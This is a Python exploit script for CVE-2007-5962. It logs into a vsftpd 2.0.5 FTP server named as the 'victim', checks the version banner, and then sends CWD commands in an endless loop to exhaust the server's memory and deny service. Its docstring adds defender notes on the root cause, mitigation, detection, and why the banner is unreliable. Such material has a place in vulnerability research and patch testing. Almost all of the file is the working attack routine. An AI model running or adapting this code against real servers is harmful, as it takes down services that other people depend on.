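#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Credits: Praveen Darshanam
Github Author: https://github.com/praveendhac
Email: praveen[underscore]recker[at]sify.com
Source: https://www.exploit-db.com/exploits/5814

Name: CVE-2007-5962

Description: vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5,
             Fedora 6 to 8, Foresight Linux, rPath Linux is prone to a
             Denial-of-Service (DoS) vulnerability. It can be exploited by
             sending a large number of CWD commands to a vsftp daemon that has
             the deny_file configuration option set in /etc/vsftpd/vsftpd.conf
             (or in the path where the FTP server is installed).

Type exploit: DOS
Platform: Red Hat Enterprise(RHEL) 5, Fedora 6/8, Foresight Linux, rPath Linux

Notes for defenders:
  * Root cause, per the public CVE description: a memory leak on the CWD path
    when deny_file is configured, so memory grows with each CWD until the
    host is exhausted.
  * Mitigation: install the distribution's fixed vsftpd package. Until then,
    drop deny_file if it is not needed and cap sessions with max_clients /
    max_per_ip.
  * Detection: with log_ftp_protocol=YES, a single authenticated session
    issuing a sustained stream of CWD commands stands out, as does steadily
    growing memory in the vsftpd session process.
  * The "(vsFTPd 2.0.5)" banner is only a hint. Distributions backport fixes
    without changing the upstream version string, so confirm exposure from
    the installed package version, not from the banner.
"""
#
# [+] this script was created from: antogit-sys
# [+] URL: https://github.com/antogit-sys/CVE-2007-5962
# [+] LICENSE: GPLv3
#

import argparse
from time import sleep

# Only this one name is used from the helper module; importing it explicitly
# keeps the module namespace free of whatever else the helper exports.
from exploitModuleFTP import exploitModuleFTP


def main(victim: str, port: int, username: str, passwd: str) -> None:
    """Connect to the FTP server and hand the session to exec_exploit().

    Args:
        victim: Host name or address of the FTP server.
        port: TCP port of the FTP service.
        username: Account used for the FTP login.
        passwd: Password for that account.
    """
    emf = exploitModuleFTP(victim, port)
    print("[*] Starting Exploit... 🚀")
    print(f"[*] Connect ftp in ({victim}, {port})")

    # connectServer() is compared against False here; anything else is passed
    # on as the server's response (helper not shown - confirm its contract).
    resp = emf.connectServer()
    if resp != False:  # noqa: E712 - keep the helper's False-sentinel semantics
        print("[*] Execute Exploit...")
        exec_exploit(emf, username, passwd, resp)
    else:
        emf.close_connection()
        print("[✘] failed to connect !!")


def exec_exploit(emf, u: str, p: str, r) -> None:
    """Check the banner, log in, and start the CWD loop on a matching server.

    Args:
        emf: Connected exploitModuleFTP instance.
        u: FTP user name.
        p: FTP password.
        r: Response returned by connectServer(); its string form is searched
            for the version banner.
    """
    bannerServer = str(r)

    # Banner match only; this does not prove the host is unpatched, because a
    # fixed distribution package can still announce 2.0.5.
    if "(vsFTPd 2.0.5)" in bannerServer:
        print("[*] Server response:")
        print(bannerServer)

        print(f"\n[*] Login {emf.ip} server...")
        print(f" ... USER {u}")
        sleep(1)
        # Never echo the real password: terminal scrollback and captured
        # output are routinely shared, and this would leak the credential.
        print(" ... PASS ********")
        sleep(1)

        r = emf.login(u, p)
        if r == False:  # noqa: E712 - login() is compared against False
            print("\n[✘] username or password incorrect !!")
        else:
            print("\n[*] Server response:")
            print(r)
            sleep(1)
            __exploit(emf, "./")
    else:
        print("[!] vsFTPd server with version other than 2.0.5")


def __exploit(emf, directory) -> None:
    """Send CWD for *directory* repeatedly until interrupted with Ctrl-C.

    Each server reply is printed. Only KeyboardInterrupt is handled; any
    error raised by the helper (for example when the server drops the
    session) propagates to the caller.
    """
    try:
        while True:
            print(emf.changeDir(str(directory)))
    except KeyboardInterrupt:
        print("\nBye Bye...")
        emf.ftp.quit()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="simple python exploit using CVE-2007-5962")

    parser.add_argument("victim", help="Victim server vsftpd 2.0.5")
    parser.add_argument("port", type=int, help="Port server vsftpd 2.0.5")
    parser.add_argument("username", help="username login")
    # NOTE(review): a password passed as a positional argument is visible in
    # the process list and shell history; use a throwaway test account.
    parser.add_argument("passwd", help="password login")

    args = parser.parse_args()

    main(args.victim, args.port, args.username, args.passwd)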